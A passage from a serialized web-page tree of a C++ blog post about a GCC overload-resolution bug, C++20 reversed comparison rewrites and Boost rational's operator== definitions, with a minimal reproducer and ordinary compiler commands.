",{"type":27,"tag":47,"props":97529,"children":97532},{"href":97530,"rel":97531},"https://gcc.gnu.org/bugzilla/show_bug.cgi?id=53499",[51],[97533],{"type":33,"value":97534},"GCC Bug 53499 – overload resolution favors non-member function",{"type":33,"value":97536},". The issue? In expressions where:",{"type":27,"tag":1228,"props":97538,"children":97539},{},[97540,97560],{"type":27,"tag":1232,"props":97541,"children":97542},{},[97543,97545,97551,97553,97558],{"type":33,"value":97544},"A class ",{"type":27,"tag":84,"props":97546,"children":97548},{"className":97547},[],[97549],{"type":33,"value":97550},"rational\u003CT>",{"type":33,"value":97552}," has a templated ",{"type":27,"tag":84,"props":97554,"children":97556},{"className":97555},[],[97557],{"type":33,"value":97473},{"type":33,"value":97559}," member function",{"type":27,"tag":1232,"props":97561,"children":97562},{},[97563,97565,97571],{"type":33,"value":97564},"There's also a more generic free ",{"type":27,"tag":84,"props":97566,"children":97568},{"className":97567},[],[97569],{"type":33,"value":97570},"operator==(rational\u003CT>, U)",{"type":33,"value":45461},{"type":27,"tag":36,"props":97573,"children":97574},{},[97575],{"type":27,"tag":12606,"props":97576,"children":97577},{},[97578],{"type":33,"value":97579},"Clang correctly chooses the member function.",{"type":27,"tag":36,"props":97581,"children":97582},{},[97583],{"type":27,"tag":12606,"props":97584,"children":97585},{},[97586],{"type":33,"value":97587},"G++ (before v14) chooses the non-member function.",{"type":27,"tag":36,"props":97589,"children":97590},{},[97591,97593,97598,97600,97607],{"type":33,"value":97592},"Why? Because G++ mishandles ",{"type":27,"tag":12606,"props":97594,"children":97595},{},[97596],{"type":33,"value":97597},"templated conversion + non-exact match",{"type":33,"value":97599},", overvaluing a non-member function with worse match quality. It does not correctly apply the overload resolution ranking rules defined in ",{"type":27,"tag":47,"props":97601,"children":97604},{"href":97602,"rel":97603},"https://cplusplus.github.io/CWG/issues/532.html",[51],[97605],{"type":33,"value":97606},"CWG532: Member/nonmember operator template partial ordering",{"type":33,"value":1041},{"type":27,"tag":58,"props":97609,"children":97611},{"id":97610},"a-minimal-reproducer",[97612],{"type":33,"value":97613},"A Minimal Reproducer",{"type":27,"tag":36,"props":97615,"children":97616},{},[97617],{"type":33,"value":97618},"Let’s see this in action:",{"type":27,"tag":101,"props":97620,"children":97622},{"code":97621,"language":8876,"meta":7,"className":8877,"style":7},"#include \u003Ciostream>\n\ntemplate \u003Ctypename IntType>\nclass rational {\npublic:\n template \u003Cclass T>\n bool operator==(const T& i) const {\n std::cout \u003C\u003C \"clang++ resolved member\" \u003C\u003C std::endl;\n return true;\n }\n};\n\ntemplate \u003Cclass Arg, class IntType>\nbool operator==(const rational\u003CIntType>& a, const Arg& b) {\n std::cout \u003C\u003C \"g++ \u003C14 resolved non-member\" \u003C\u003C std::endl;\n return false;\n}\n\nint main() {\n rational\u003Cint> r;\n return r == 0;\n}\n",[97623],{"type":27,"tag":84,"props":97624,"children":97625},{"__ignoreMap":7},[97626,97639,97646,97671,97687,97695,97719,97764,97792,97807,97814,97821,97828,97864,97932,97957,97972,97979,97986,98002,98027,98051],{"type":27,"tag":207,"props":97627,"children":97628},{"class":209,"line":210},[97629,97634],{"type":27,"tag":207,"props":97630,"children":97631},{"style":376},[97632],{"type":33,"value":97633},"#include",{"type":27,"tag":207,"props":97635,"children":97636},{"style":1325},[97637],{"type":33,"value":97638}," \u003Ciostream>\n",{"type":27,"tag":207,"props":97640,"children":97641},{"class":209,"line":244},[97642],{"type":27,"tag":207,"props":97643,"children":97644},{"emptyLinePlaceholder":19},[97645],{"type":33,"value":2062},{"type":27,"tag":207,"props":97647,"children":97648},{"class":209,"line":270},[97649,97653,97657,97662,97667],{"type":27,"tag":207,"props":97650,"children":97651},{"style":214},[97652],{"type":33,"value":73449},{"type":27,"tag":207,"props":97654,"children":97655},{"style":238},[97656],{"type":33,"value":4695},{"type":27,"tag":207,"props":97658,"children":97659},{"style":214},[97660],{"type":33,"value":97661},"typename",{"type":27,"tag":207,"props":97663,"children":97664},{"style":8920},[97665],{"type":33,"value":97666}," IntType",{"type":27,"tag":207,"props":97668,"children":97669},{"style":238},[97670],{"type":33,"value":13274},{"type":27,"tag":207,"props":97672,"children":97673},{"class":209,"line":296},[97674,97678,97683],{"type":27,"tag":207,"props":97675,"children":97676},{"style":214},[97677],{"type":33,"value":77643},{"type":27,"tag":207,"props":97679,"children":97680},{"style":8920},[97681],{"type":33,"value":97682}," rational",{"type":27,"tag":207,"props":97684,"children":97685},{"style":238},[97686],{"type":33,"value":384},{"type":27,"tag":207,"props":97688,"children":97689},{"class":209,"line":445},[97690],{"type":27,"tag":207,"props":97691,"children":97692},{"style":214},[97693],{"type":33,"value":97694},"public:\n",{"type":27,"tag":207,"props":97696,"children":97697},{"class":209,"line":867},[97698,97703,97707,97711,97715],{"type":27,"tag":207,"props":97699,"children":97700},{"style":214},[97701],{"type":33,"value":97702}," template",{"type":27,"tag":207,"props":97704,"children":97705},{"style":238},[97706],{"type":33,"value":4695},{"type":27,"tag":207,"props":97708,"children":97709},{"style":214},[97710],{"type":33,"value":77643},{"type":27,"tag":207,"props":97712,"children":97713},{"style":8920},[97714],{"type":33,"value":13200},{"type":27,"tag":207,"props":97716,"children":97717},{"style":238},[97718],{"type":33,"value":13274},{"type":27,"tag":207,"props":97720,"children":97721},{"class":209,"line":892},[97722,97726,97731,97736,97740,97744,97748,97752,97756,97760],{"type":27,"tag":207,"props":97723,"children":97724},{"style":214},[97725],{"type":33,"value":53715},{"type":27,"tag":207,"props":97727,"children":97728},{"style":214},[97729],{"type":33,"value":97730}," operator",{"type":27,"tag":207,"props":97732,"children":97733},{"style":238},[97734],{"type":33,"value":97735},"==(",{"type":27,"tag":207,"props":97737,"children":97738},{"style":214},[97739],{"type":33,"value":16931},{"type":27,"tag":207,"props":97741,"children":97742},{"style":8920},[97743],{"type":33,"value":13200},{"type":27,"tag":207,"props":97745,"children":97746},{"style":214},[97747],{"type":33,"value":10398},{"type":27,"tag":207,"props":97749,"children":97750},{"style":220},[97751],{"type":33,"value":4671},{"type":27,"tag":207,"props":97753,"children":97754},{"style":238},[97755],{"type":33,"value":2222},{"type":27,"tag":207,"props":97757,"children":97758},{"style":214},[97759],{"type":33,"value":16931},{"type":27,"tag":207,"props":97761,"children":97762},{"style":238},[97763],{"type":33,"value":384},{"type":27,"tag":207,"props":97765,"children":97766},{"class":209,"line":1475},[97767,97772,97777,97782,97787],{"type":27,"tag":207,"props":97768,"children":97769},{"style":238},[97770],{"type":33,"value":97771}," std::cout ",{"type":27,"tag":207,"props":97773,"children":97774},{"style":226},[97775],{"type":33,"value":97776},"\u003C\u003C",{"type":27,"tag":207,"props":97778,"children":97779},{"style":1325},[97780],{"type":33,"value":97781}," \"clang++ resolved member\"",{"type":27,"tag":207,"props":97783,"children":97784},{"style":226},[97785],{"type":33,"value":97786}," \u003C\u003C",{"type":27,"tag":207,"props":97788,"children":97789},{"style":238},[97790],{"type":33,"value":97791}," std::endl;\n",{"type":27,"tag":207,"props":97793,"children":97794},{"class":209,"line":2065},[97795,97799,97803],{"type":27,"tag":207,"props":97796,"children":97797},{"style":376},[97798],{"type":33,"value":23019},{"type":27,"tag":207,"props":97800,"children":97801},{"style":214},[97802],{"type":33,"value":19746},{"type":27,"tag":207,"props":97804,"children":97805},{"style":238},[97806],{"type":33,"value":241},{"type":27,"tag":207,"props":97808,"children":97809},{"class":209,"line":2092},[97810],{"type":27,"tag":207,"props":97811,"children":97812},{"style":238},[97813],{"type":33,"value":10645},{"type":27,"tag":207,"props":97815,"children":97816},{"class":209,"line":2130},[97817],{"type":27,"tag":207,"props":97818,"children":97819},{"style":238},[97820],{"type":33,"value":23852},{"type":27,"tag":207,"props":97822,"children":97823},{"class":209,"line":2168},[97824],{"type":27,"tag":207,"props":97825,"children":97826},{"emptyLinePlaceholder":19},[97827],{"type":33,"value":2062},{"type":27,"tag":207,"props":97829,"children":97830},{"class":209,"line":4095},[97831,97835,97839,97843,97848,97852,97856,97860],{"type":27,"tag":207,"props":97832,"children":97833},{"style":214},[97834],{"type":33,"value":73449},{"type":27,"tag":207,"props":97836,"children":97837},{"style":238},[97838],{"type":33,"value":4695},{"type":27,"tag":207,"props":97840,"children":97841},{"style":214},[97842],{"type":33,"value":77643},{"type":27,"tag":207,"props":97844,"children":97845},{"style":8920},[97846],{"type":33,"value":97847}," Arg",{"type":27,"tag":207,"props":97849,"children":97850},{"style":238},[97851],{"type":33,"value":1123},{"type":27,"tag":207,"props":97853,"children":97854},{"style":214},[97855],{"type":33,"value":77643},{"type":27,"tag":207,"props":97857,"children":97858},{"style":8920},[97859],{"type":33,"value":97666},{"type":27,"tag":207,"props":97861,"children":97862},{"style":238},[97863],{"type":33,"value":13274},{"type":27,"tag":207,"props":97865,"children":97866},{"class":209,"line":4103},[97867,97871,97875,97879,97883,97887,97891,97896,97900,97904,97908,97912,97916,97920,97924,97928],{"type":27,"tag":207,"props":97868,"children":97869},{"style":214},[97870],{"type":33,"value":36947},{"type":27,"tag":207,"props":97872,"children":97873},{"style":214},[97874],{"type":33,"value":97730},{"type":27,"tag":207,"props":97876,"children":97877},{"style":238},[97878],{"type":33,"value":97735},{"type":27,"tag":207,"props":97880,"children":97881},{"style":214},[97882],{"type":33,"value":16931},{"type":27,"tag":207,"props":97884,"children":97885},{"style":8920},[97886],{"type":33,"value":97682},{"type":27,"tag":207,"props":97888,"children":97889},{"style":238},[97890],{"type":33,"value":9257},{"type":27,"tag":207,"props":97892,"children":97893},{"style":8920},[97894],{"type":33,"value":97895},"IntType",{"type":27,"tag":207,"props":97897,"children":97898},{"style":238},[97899],{"type":33,"value":17739},{"type":27,"tag":207,"props":97901,"children":97902},{"style":214},[97903],{"type":33,"value":10398},{"type":27,"tag":207,"props":97905,"children":97906},{"style":220},[97907],{"type":33,"value":223},{"type":27,"tag":207,"props":97909,"children":97910},{"style":238},[97911],{"type":33,"value":1123},{"type":27,"tag":207,"props":97913,"children":97914},{"style":214},[97915],{"type":33,"value":16931},{"type":27,"tag":207,"props":97917,"children":97918},{"style":8920},[97919],{"type":33,"value":97847},{"type":27,"tag":207,"props":97921,"children":97922},{"style":214},[97923],{"type":33,"value":10398},{"type":27,"tag":207,"props":97925,"children":97926},{"style":220},[97927],{"type":33,"value":254},{"type":27,"tag":207,"props":97929,"children":97930},{"style":238},[97931],{"type":33,"value":1424},{"type":27,"tag":207,"props":97933,"children":97934},{"class":209,"line":4154},[97935,97940,97944,97949,97953],{"type":27,"tag":207,"props":97936,"children":97937},{"style":238},[97938],{"type":33,"value":97939}," std::cout ",{"type":27,"tag":207,"props":97941,"children":97942},{"style":226},[97943],{"type":33,"value":97776},{"type":27,"tag":207,"props":97945,"children":97946},{"style":1325},[97947],{"type":33,"value":97948}," \"g++ \u003C14 resolved non-member\"",{"type":27,"tag":207,"props":97950,"children":97951},{"style":226},[97952],{"type":33,"value":97786},{"type":27,"tag":207,"props":97954,"children":97955},{"style":238},[97956],{"type":33,"value":97791},{"type":27,"tag":207,"props":97958,"children":97959},{"class":209,"line":4203},[97960,97964,97968],{"type":27,"tag":207,"props":97961,"children":97962},{"style":376},[97963],{"type":33,"value":8986},{"type":27,"tag":207,"props":97965,"children":97966},{"style":214},[97967],{"type":33,"value":16337},{"type":27,"tag":207,"props":97969,"children":97970},{"style":238},[97971],{"type":33,"value":241},{"type":27,"tag":207,"props":97973,"children":97974},{"class":209,"line":4249},[97975],{"type":27,"tag":207,"props":97976,"children":97977},{"style":238},[97978],{"type":33,"value":451},{"type":27,"tag":207,"props":97980,"children":97981},{"class":209,"line":4290},[97982],{"type":27,"tag":207,"props":97983,"children":97984},{"emptyLinePlaceholder":19},[97985],{"type":33,"value":2062},{"type":27,"tag":207,"props":97987,"children":97988},{"class":209,"line":4304},[97989,97993,97998],{"type":27,"tag":207,"props":97990,"children":97991},{"style":214},[97992],{"type":33,"value":26317},{"type":27,"tag":207,"props":97994,"children":97995},{"style":1335},[97996],{"type":33,"value":97997}," main",{"type":27,"tag":207,"props":97999,"children":98000},{"style":238},[98001],{"type":33,"value":23011},{"type":27,"tag":207,"props":98003,"children":98004},{"class":209,"line":5466},[98005,98010,98014,98018,98022],{"type":27,"tag":207,"props":98006,"children":98007},{"style":238},[98008],{"type":33,"value":98009}," rational",{"type":27,"tag":207,"props":98011,"children":98012},{"style":226},[98013],{"type":33,"value":9257},{"type":27,"tag":207,"props":98015,"children":98016},{"style":214},[98017],{"type":33,"value":26317},{"type":27,"tag":207,"props":98019,"children":98020},{"style":226},[98021],{"type":33,"value":17739},{"type":27,"tag":207,"props":98023,"children":98024},{"style":238},[98025],{"type":33,"value":98026}," r;\n",{"type":27,"tag":207,"props":98028,"children":98029},{"class":209,"line":5530},[98030,98034,98039,98043,98047],{"type":27,"tag":207,"props":98031,"children":98032},{"style":376},[98033],{"type":33,"value":8986},{"type":27,"tag":207,"props":98035,"children":98036},{"style":238},[98037],{"type":33,"value":98038}," r ",{"type":27,"tag":207,"props":98040,"children":98041},{"style":226},[98042],{"type":33,"value":15856},{"type":27,"tag":207,"props":98044,"children":98045},{"style":232},[98046],{"type":33,"value":4680},{"type":27,"tag":207,"props":98048,"children":98049},{"style":238},[98050],{"type":33,"value":241},{"type":27,"tag":207,"props":98052,"children":98053},{"class":209,"line":7900},[98054],{"type":27,"tag":207,"props":98055,"children":98056},{"style":238},[98057],{"type":33,"value":451},{"type":27,"tag":1228,"props":98059,"children":98060},{},[98061],{"type":27,"tag":1232,"props":98062,"children":98063},{},[98064],{"type":33,"value":98065},"Compile with g++\u003C14:",{"type":27,"tag":101,"props":98067,"children":98069},{"code":98068,"language":11526,"meta":7,"className":11527,"style":7},"g++ -std=c++17 main.cpp -o test && ./test\n",[98070],{"type":27,"tag":84,"props":98071,"children":98072},{"__ignoreMap":7},[98073],{"type":27,"tag":207,"props":98074,"children":98075},{"class":209,"line":210},[98076,98081,98086,98091,98096,98100,98105],{"type":27,"tag":207,"props":98077,"children":98078},{"style":1335},[98079],{"type":33,"value":98080},"g++",{"type":27,"tag":207,"props":98082,"children":98083},{"style":1325},[98084],{"type":33,"value":98085}," -std=c++17",{"type":27,"tag":207,"props":98087,"children":98088},{"style":1325},[98089],{"type":33,"value":98090}," main.cpp",{"type":27,"tag":207,"props":98092,"children":98093},{"style":1325},[98094],{"type":33,"value":98095}," -o",{"type":27,"tag":207,"props":98097,"children":98098},{"style":1325},[98099],{"type":33,"value":37939},{"type":27,"tag":207,"props":98101,"children":98102},{"style":238},[98103],{"type":33,"value":98104}," && ",{"type":27,"tag":207,"props":98106,"children":98107},{"style":1335},[98108],{"type":33,"value":98109},"./test\n",{"type":27,"tag":36,"props":98111,"children":98112},{},[98113],{"type":33,"value":98114},"Output (on g++ 11.4):",{"type":27,"tag":101,"props":98116,"children":98118},{"code":98117},"g++ \u003C14 resolved non-member\n",[98119],{"type":27,"tag":84,"props":98120,"children":98121},{"__ignoreMap":7},[98122],{"type":33,"value":98117},{"type":27,"tag":1228,"props":98124,"children":98125},{},[98126],{"type":27,"tag":1232,"props":98127,"children":98128},{},[98129],{"type":33,"value":98130},"Compile with clang++:",{"type":27,"tag":101,"props":98132,"children":98134},{"code":98133,"language":11526,"meta":7,"className":11527,"style":7},"clang++ -std=c++17 main.cpp -o test && ./test\n",[98135],{"type":27,"tag":84,"props":98136,"children":98137},{"__ignoreMap":7},[98138],{"type":27,"tag":207,"props":98139,"children":98140},{"class":209,"line":210},[98141,98146,98150,98154,98158,98162,98166],{"type":27,"tag":207,"props":98142,"children":98143},{"style":1335},[98144],{"type":33,"value":98145},"clang++",{"type":27,"tag":207,"props":98147,"children":98148},{"style":1325},[98149],{"type":33,"value":98085},{"type":27,"tag":207,"props":98151,"children":98152},{"style":1325},[98153],{"type":33,"value":98090},{"type":27,"tag":207,"props":98155,"children":98156},{"style":1325},[98157],{"type":33,"value":98095},{"type":27,"tag":207,"props":98159,"children":98160},{"style":1325},[98161],{"type":33,"value":37939},{"type":27,"tag":207,"props":98163,"children":98164},{"style":238},[98165],{"type":33,"value":98104},{"type":27,"tag":207,"props":98167,"children":98168},{"style":1335},[98169],{"type":33,"value":98109},{"type":27,"tag":36,"props":98171,"children":98172},{},[98173],{"type":33,"value":98174},"Output:",{"type":27,"tag":101,"props":98176,"children":98178},{"code":98177},"clang++ resolved member\n",[98179],{"type":27,"tag":84,"props":98180,"children":98181},{"__ignoreMap":7},[98182],{"type":33,"value":98177},{"type":27,"tag":36,"props":98184,"children":98185},{},[98186],{"type":33,"value":98187},"In short, the wrong function gets picked. G++ was broken here until v14.",{"type":27,"tag":26063,"props":98189,"children":98190},{},[],{"type":27,"tag":28,"props":98192,"children":98194},{"id":98193},"part-ii-c20s-symmetric-comparison-feature",[98195],{"type":33,"value":98196},"Part II: C++20’s Symmetric Comparison Feature",{"type":27,"tag":58,"props":98198,"children":98200},{"id":98199},"what-changed-in-c20",[98201],{"type":33,"value":98202},"What Changed in C++20?",{"type":27,"tag":36,"props":98204,"children":98205},{},[98206,98208,98221,98222,98227],{"type":33,"value":98207},"C++20 introduced the ",{"type":27,"tag":47,"props":98209,"children":98212},{"href":98210,"rel":98211},"https://en.cppreference.com/w/cpp/language/operator_comparison",[51],[98213,98215],{"type":33,"value":98214},"spaceship operator ",{"type":27,"tag":84,"props":98216,"children":98218},{"className":98217},[],[98219],{"type":33,"value":98220},"\u003C=>",{"type":33,"value":1131},{"type":27,"tag":12606,"props":98223,"children":98224},{},[98225],{"type":33,"value":98226},"defaulted comparison rewrites",{"type":33,"value":1041},{"type":27,"tag":36,"props":98229,"children":98230},{},[98231,98233,98238],{"type":33,"value":98232},"When you define a two-argument ",{"type":27,"tag":84,"props":98234,"children":98236},{"className":98235},[],[98237],{"type":33,"value":97473},{"type":33,"value":98239},", C++20 may implicitly define the \"reversed\" version:",{"type":27,"tag":1228,"props":98241,"children":98242},{},[98243,98254],{"type":27,"tag":1232,"props":98244,"children":98245},{},[98246,98248],{"type":33,"value":98247},"If you define: ",{"type":27,"tag":84,"props":98249,"children":98251},{"className":98250},[],[98252],{"type":33,"value":98253},"bool operator==(T1, T2);",{"type":27,"tag":1232,"props":98255,"children":98256},{},[98257,98259,98265],{"type":33,"value":98258},"Then ",{"type":27,"tag":84,"props":98260,"children":98262},{"className":98261},[],[98263],{"type":33,"value":98264},"T2 == T1",{"type":33,"value":98266}," may call the same function by reversing the arguments.",{"type":27,"tag":36,"props":98268,"children":98269},{},[98270,98272,98277,98278,98283,98285,98291,98293,98298],{"type":33,"value":98271},"This rewrite is ",{"type":27,"tag":12606,"props":98273,"children":98274},{},[98275],{"type":33,"value":98276},"recursive",{"type":33,"value":22606},{"type":27,"tag":84,"props":98279,"children":98281},{"className":98280},[],[98282],{"type":33,"value":97465},{"type":33,"value":98284}," becomes ",{"type":27,"tag":84,"props":98286,"children":98288},{"className":98287},[],[98289],{"type":33,"value":98290},"b == a",{"type":33,"value":98292},", which becomes ",{"type":27,"tag":84,"props":98294,"children":98296},{"className":98295},[],[98297],{"type":33,"value":97465},{"type":33,"value":98299}," again, and so on — if not handled carefully.",{"type":27,"tag":36,"props":98301,"children":98302},{},[98303],{"type":33,"value":98304},"This is great for reducing boilerplate — unless the call becomes ambiguous or self-referential.",{"type":27,"tag":26063,"props":98306,"children":98307},{},[],{"type":27,"tag":28,"props":98309,"children":98311},{"id":98310},"part-iii-the-boost-trapdoor",[98312],{"type":33,"value":98313},"Part III: The Boost Trapdoor",{"type":27,"tag":36,"props":98315,"children":98316},{},[98317,98319,98325,98327,98332],{"type":33,"value":98318},"The old Boost ",{"type":27,"tag":84,"props":98320,"children":98322},{"className":98321},[],[98323],{"type":33,"value":98324},"rational",{"type":33,"value":98326}," class (prior to v1.75) defined both member function and non-member function of ",{"type":27,"tag":84,"props":98328,"children":98330},{"className":98329},[],[98331],{"type":33,"value":97473},{"type":33,"value":736},{"type":27,"tag":101,"props":98334,"children":98336},{"code":98335,"language":8876,"meta":7,"className":8877,"style":7},"template \u003Cclass Arg, class IntType>\ntemplate \u003Ctypename IntType>\nclass rational\n{\n ...\npublic:\n ...\n \n template \u003Cclass T>\n BOOST_CONSTEXPR typename boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003CT, IntType>::value, bool>::type operator== (const T& i) const\n {\n return ((den == IntType(1)) && (num == i));\n }\n ...\n}\n\ntemplate \u003Cclass Arg, class IntType>\nBOOST_CONSTEXPR\ninline typename boost::enable_if_c \u003C\n rational_detail::is_compatible_integer\u003CArg, IntType>::value, bool>::type\n operator == (const Arg& b, const rational\u003CIntType>& a)\n{\n return a == b; \n}\n",[98337],{"type":27,"tag":84,"props":98338,"children":98339},{"__ignoreMap":7},[98340,98375,98398,98410,98417,98424,98431,98438,98445,98468,98556,98563,98614,98621,98628,98635,98642,98677,98685,98713,98752,98817,98824,98844],{"type":27,"tag":207,"props":98341,"children":98342},{"class":209,"line":210},[98343,98347,98351,98355,98359,98363,98367,98371],{"type":27,"tag":207,"props":98344,"children":98345},{"style":214},[98346],{"type":33,"value":73449},{"type":27,"tag":207,"props":98348,"children":98349},{"style":238},[98350],{"type":33,"value":4695},{"type":27,"tag":207,"props":98352,"children":98353},{"style":214},[98354],{"type":33,"value":77643},{"type":27,"tag":207,"props":98356,"children":98357},{"style":8920},[98358],{"type":33,"value":97847},{"type":27,"tag":207,"props":98360,"children":98361},{"style":238},[98362],{"type":33,"value":1123},{"type":27,"tag":207,"props":98364,"children":98365},{"style":214},[98366],{"type":33,"value":77643},{"type":27,"tag":207,"props":98368,"children":98369},{"style":8920},[98370],{"type":33,"value":97666},{"type":27,"tag":207,"props":98372,"children":98373},{"style":238},[98374],{"type":33,"value":13274},{"type":27,"tag":207,"props":98376,"children":98377},{"class":209,"line":244},[98378,98382,98386,98390,98394],{"type":27,"tag":207,"props":98379,"children":98380},{"style":214},[98381],{"type":33,"value":73449},{"type":27,"tag":207,"props":98383,"children":98384},{"style":238},[98385],{"type":33,"value":4695},{"type":27,"tag":207,"props":98387,"children":98388},{"style":214},[98389],{"type":33,"value":97661},{"type":27,"tag":207,"props":98391,"children":98392},{"style":8920},[98393],{"type":33,"value":97666},{"type":27,"tag":207,"props":98395,"children":98396},{"style":238},[98397],{"type":33,"value":13274},{"type":27,"tag":207,"props":98399,"children":98400},{"class":209,"line":270},[98401,98405],{"type":27,"tag":207,"props":98402,"children":98403},{"style":214},[98404],{"type":33,"value":77643},{"type":27,"tag":207,"props":98406,"children":98407},{"style":8920},[98408],{"type":33,"value":98409}," rational\n",{"type":27,"tag":207,"props":98411,"children":98412},{"class":209,"line":296},[98413],{"type":27,"tag":207,"props":98414,"children":98415},{"style":238},[98416],{"type":33,"value":18158},{"type":27,"tag":207,"props":98418,"children":98419},{"class":209,"line":445},[98420],{"type":27,"tag":207,"props":98421,"children":98422},{"style":238},[98423],{"type":33,"value":27611},{"type":27,"tag":207,"props":98425,"children":98426},{"class":209,"line":867},[98427],{"type":27,"tag":207,"props":98428,"children":98429},{"style":214},[98430],{"type":33,"value":97694},{"type":27,"tag":207,"props":98432,"children":98433},{"class":209,"line":892},[98434],{"type":27,"tag":207,"props":98435,"children":98436},{"style":238},[98437],{"type":33,"value":27611},{"type":27,"tag":207,"props":98439,"children":98440},{"class":209,"line":1475},[98441],{"type":27,"tag":207,"props":98442,"children":98443},{"style":238},[98444],{"type":33,"value":69018},{"type":27,"tag":207,"props":98446,"children":98447},{"class":209,"line":2065},[98448,98452,98456,98460,98464],{"type":27,"tag":207,"props":98449,"children":98450},{"style":214},[98451],{"type":33,"value":97702},{"type":27,"tag":207,"props":98453,"children":98454},{"style":238},[98455],{"type":33,"value":4695},{"type":27,"tag":207,"props":98457,"children":98458},{"style":214},[98459],{"type":33,"value":77643},{"type":27,"tag":207,"props":98461,"children":98462},{"style":8920},[98463],{"type":33,"value":13200},{"type":27,"tag":207,"props":98465,"children":98466},{"style":238},[98467],{"type":33,"value":13274},{"type":27,"tag":207,"props":98469,"children":98470},{"class":209,"line":2092},[98471,98476,98480,98485,98489,98493,98497,98502,98506,98510,98514,98518,98522,98526,98531,98535,98539,98543,98547,98551],{"type":27,"tag":207,"props":98472,"children":98473},{"style":238},[98474],{"type":33,"value":98475}," BOOST_CONSTEXPR ",{"type":27,"tag":207,"props":98477,"children":98478},{"style":214},[98479],{"type":33,"value":97661},{"type":27,"tag":207,"props":98481,"children":98482},{"style":238},[98483],{"type":33,"value":98484}," boost::enable_if_c\u003Crational_detail::is_compatible_integer\u003C",{"type":27,"tag":207,"props":98486,"children":98487},{"style":8920},[98488],{"type":33,"value":13269},{"type":27,"tag":207,"props":98490,"children":98491},{"style":238},[98492],{"type":33,"value":1123},{"type":27,"tag":207,"props":98494,"children":98495},{"style":8920},[98496],{"type":33,"value":97895},{"type":27,"tag":207,"props":98498,"children":98499},{"style":238},[98500],{"type":33,"value":98501},">::",{"type":27,"tag":207,"props":98503,"children":98504},{"style":8920},[98505],{"type":33,"value":4196},{"type":27,"tag":207,"props":98507,"children":98508},{"style":238},[98509],{"type":33,"value":1123},{"type":27,"tag":207,"props":98511,"children":98512},{"style":214},[98513],{"type":33,"value":36947},{"type":27,"tag":207,"props":98515,"children":98516},{"style":238},[98517],{"type":33,"value":98501},{"type":27,"tag":207,"props":98519,"children":98520},{"style":8920},[98521],{"type":33,"value":40014},{"type":27,"tag":207,"props":98523,"children":98524},{"style":214},[98525],{"type":33,"value":97730},{"type":27,"tag":207,"props":98527,"children":98528},{"style":238},[98529],{"type":33,"value":98530},"== (",{"type":27,"tag":207,"props":98532,"children":98533},{"style":214},[98534],{"type":33,"value":16931},{"type":27,"tag":207,"props":98536,"children":98537},{"style":8920},[98538],{"type":33,"value":13200},{"type":27,"tag":207,"props":98540,"children":98541},{"style":214},[98542],{"type":33,"value":10398},{"type":27,"tag":207,"props":98544,"children":98545},{"style":220},[98546],{"type":33,"value":4671},{"type":27,"tag":207,"props":98548,"children":98549},{"style":238},[98550],{"type":33,"value":2222},{"type":27,"tag":207,"props":98552,"children":98553},{"style":214},[98554],{"type":33,"value":98555},"const\n",{"type":27,"tag":207,"props":98557,"children":98558},{"class":209,"line":2130},[98559],{"type":27,"tag":207,"props":98560,"children":98561},{"style":238},[98562],{"type":33,"value":36449},{"type":27,"tag":207,"props":98564,"children":98565},{"class":209,"line":2168},[98566,98571,98576,98580,98584,98588,98592,98596,98600,98605,98609],{"type":27,"tag":207,"props":98567,"children":98568},{"style":376},[98569],{"type":33,"value":98570}," return",{"type":27,"tag":207,"props":98572,"children":98573},{"style":238},[98574],{"type":33,"value":98575}," ((den ",{"type":27,"tag":207,"props":98577,"children":98578},{"style":226},[98579],{"type":33,"value":15856},{"type":27,"tag":207,"props":98581,"children":98582},{"style":1335},[98583],{"type":33,"value":97666},{"type":27,"tag":207,"props":98585,"children":98586},{"style":238},[98587],{"type":33,"value":1343},{"type":27,"tag":207,"props":98589,"children":98590},{"style":232},[98591],{"type":33,"value":1651},{"type":27,"tag":207,"props":98593,"children":98594},{"style":238},[98595],{"type":33,"value":16117},{"type":27,"tag":207,"props":98597,"children":98598},{"style":226},[98599],{"type":33,"value":80428},{"type":27,"tag":207,"props":98601,"children":98602},{"style":238},[98603],{"type":33,"value":98604}," (num ",{"type":27,"tag":207,"props":98606,"children":98607},{"style":226},[98608],{"type":33,"value":15856},{"type":27,"tag":207,"props":98610,"children":98611},{"style":238},[98612],{"type":33,"value":98613}," i));\n",{"type":27,"tag":207,"props":98615,"children":98616},{"class":209,"line":4095},[98617],{"type":27,"tag":207,"props":98618,"children":98619},{"style":238},[98620],{"type":33,"value":10645},{"type":27,"tag":207,"props":98622,"children":98623},{"class":209,"line":4103},[98624],{"type":27,"tag":207,"props":98625,"children":98626},{"style":238},[98627],{"type":33,"value":27611},{"type":27,"tag":207,"props":98629,"children":98630},{"class":209,"line":4154},[98631],{"type":27,"tag":207,"props":98632,"children":98633},{"style":238},[98634],{"type":33,"value":451},{"type":27,"tag":207,"props":98636,"children":98637},{"class":209,"line":4203},[98638],{"type":27,"tag":207,"props":98639,"children":98640},{"emptyLinePlaceholder":19},[98641],{"type":33,"value":2062},{"type":27,"tag":207,"props":98643,"children":98644},{"class":209,"line":4249},[98645,98649,98653,98657,98661,98665,98669,98673],{"type":27,"tag":207,"props":98646,"children":98647},{"style":214},[98648],{"type":33,"value":73449},{"type":27,"tag":207,"props":98650,"children":98651},{"style":238},[98652],{"type":33,"value":4695},{"type":27,"tag":207,"props":98654,"children":98655},{"style":214},[98656],{"type":33,"value":77643},{"type":27,"tag":207,"props":98658,"children":98659},{"style":8920},[98660],{"type":33,"value":97847},{"type":27,"tag":207,"props":98662,"children":98663},{"style":238},[98664],{"type":33,"value":1123},{"type":27,"tag":207,"props":98666,"children":98667},{"style":214},[98668],{"type":33,"value":77643},{"type":27,"tag":207,"props":98670,"children":98671},{"style":8920},[98672],{"type":33,"value":97666},{"type":27,"tag":207,"props":98674,"children":98675},{"style":238},[98676],{"type":33,"value":13274},{"type":27,"tag":207,"props":98678,"children":98679},{"class":209,"line":4290},[98680],{"type":27,"tag":207,"props":98681,"children":98682},{"style":238},[98683],{"type":33,"value":98684},"BOOST_CONSTEXPR\n",{"type":27,"tag":207,"props":98686,"children":98687},{"class":209,"line":4304},[98688,98693,98698,98703,98708],{"type":27,"tag":207,"props":98689,"children":98690},{"style":214},[98691],{"type":33,"value":98692},"inline",{"type":27,"tag":207,"props":98694,"children":98695},{"style":214},[98696],{"type":33,"value":98697}," typename",{"type":27,"tag":207,"props":98699,"children":98700},{"style":238},[98701],{"type":33,"value":98702}," 